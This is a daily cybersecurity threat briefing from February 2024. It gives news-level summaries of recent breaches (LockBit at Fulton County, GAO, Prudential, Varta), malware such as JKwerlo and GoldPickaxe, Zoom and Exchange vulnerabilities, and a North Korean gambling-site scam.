Cyware Daily Threat Intelligence

Cyware Daily Threat Intelligence - Featured Image

Daily Threat Briefing February 15, 2024

The illicit acquisition of biometric data presents profound risks. Recently, alleged Chinese threat actors have been detected attempting to pilfer facial biometrics for the creation of deepfake videos, leading to a break-in for bank login credentials. For this, they are using GoldPickaxe trojan. Additionally, a new ransomware strain, called JKwerlo, was found targeting French and Spanish speakers in Europe. Its Go-based architecture, encoded PowerShell commands, lateral movement techniques, and evasion tactics reflect the exceptional detailing and sophistication of the cybercriminals involved.

What’s more? A critical vulnerability in Zoom desktop, VDI clients, and Meeting SDK for Windows can enable unauthenticated attackers to escalate privileges over a network. Users are urged to update to the latest releases to address this flaw and six other vulnerabilities for enhanced security.

Top Breaches Reported in the Last 24 Hours

LockBit strikes Georgia County

Fulton County, Georgia, came under attack by the LockBit ransomware group, triggering widespread IT outages affecting phone, court, and tax systems. While initial investigations didn’t identify any citizen or employee data theft, LockBit threatens to publish confidential documents unless a ransom is paid by February 16. Fulton County Chair Robb Pitt confirmed disruptions in the property tax system and facing water billing issues due to the attack.

Atlassian bug exposes employee records

A breach at the Government Accountability Office (GAO) compromised the data of thousands of employees. Cybercriminals exploited a vulnerability in the Atlassian Confluence tool. Contractor CGI Federal notified GAO of the breach affecting 6,600 individuals. Meanwhile, Atlassian urged customers to take swift action to safeguard their data.

Employee data accessed at a finance firm

Prudential Financial, a prominent global financial services firm, notified the SEC of a network breach where attackers accessed administrative and user data from certain systems. Investigations are ongoing to assess the full impact of the attack. Fortunately, there's no evidence of customer data compromise, and the breach hasn't materially impacted operations or financials.

German battery manufacturer halts production

German battery manufacturer Varta experienced a cyberattack, forcing the shutdown of its IT systems and production across five plants, including those in Germany, Romania, and Indonesia. While the nature of the attack remains undisclosed, suspicions lean toward a ransomware incident. The extent of the damage is still under assessment.

Intelligence agency spills data

The Defense Intelligence Agency of the U.S. DOD informed approximately 20,600 individuals of a data incident, compromising their sensitive emails due to a misconfigured government cloud email server hosted by Microsoft. The breach occurred between February 3 and February 20, 2023. The exposed emails contained sensitive personnel information, including data related to U.S. Special Operations Command.

Top Malware Reported in the Last 24 Hours

JKwerlo malware targets European victims

French and Spanish-speaking victims in Europe are being targeted by JKwerlo, a Go-based ransomware variant. According to experts at Cyble, the ransomware employs meticulously crafted cyberattacks, distributing language-specific HTML files via spam emails to initiate its campaign. JKwerlo infiltrates systems using encoded PowerShell commands, leveraging Dropbox links and lateral movement techniques like PsExec and Rubeus to evade detection.

New trojan steals facial biometric data

Security researchers uncovered a sophisticated new trojan called GoldPickaxe, designed to steal facial biometric data and create deepfake videos to bypass banking logins. Developed by a suspected Chinese-speaking cybercrime group dubbed GoldFactory, the malware targets victims in Thailand and Vietnam. Once activated, the trojan intercepts SMS messages, proxies traffic, and prompts victims to record videos, enabling cybercriminals to perform unauthorized access to victims' bank accounts.

Qakbot shows signs of resurgence

Despite a major takedown by U.S. law enforcement, new samples of Qakbot botnet have been observed in the wild. Spotted around mid-December, the strains feature improved encryption and evasion techniques. Security analysts discovered a small-scale campaign directed at the hospitality sector, using a PDF file allegedly from the U.S. Internal Revenue Service.

Top Vulnerabilities Reported in the Last 24 Hours

Zoom flaw poses privilege escalation risks

Zoom's desktop and VDI clients, along with its Meeting SDK for Windows, are susceptible to a critical vulnerability discovered by Zoom's offensive security team. Identified as CVE-2024-24691 and rated 9.6 on the CVSS scale, the flaw enables unauthenticated attackers to conduct privilege escalation over a network. While specifics of exploitation remain undisclosed, user interaction is required. Zoom urges users to update to the latest versions.

Critical bugs in Exchange server

Microsoft identified critical vulnerabilities in its Exchange server, including CVE-2024-21410, enabling privilege escalation through pass-the-hash attacks. Attackers could exploit this flaw to relay a user's Net-NTLMv2 hash and gain unauthorized access. The issue stems from NTLM credential relay protection or EPA not being enabled by default. Additionally, CVE-2024-21413 allows attackers to bypass Office Protected View in Outlook, posing risks of data theft and malware execution.

Top Scams Reported in the Last 24 Hours

Billions profited from malicious gambling sites

South Korea's National Intelligence Service reported that North Korea's Office 39 is selling pre-infected gambling websites to South Korean cybercrime groups. The scheme, believed to have generated billions, offers websites at $5,000/month with optional tech support for $3,000/month. The sites steal the personal data of South Korean citizens. To evade sanctions, North Koreans pose as Chinese IT workers, forging credentials and using Chinese bank accounts.

Related Threat Briefings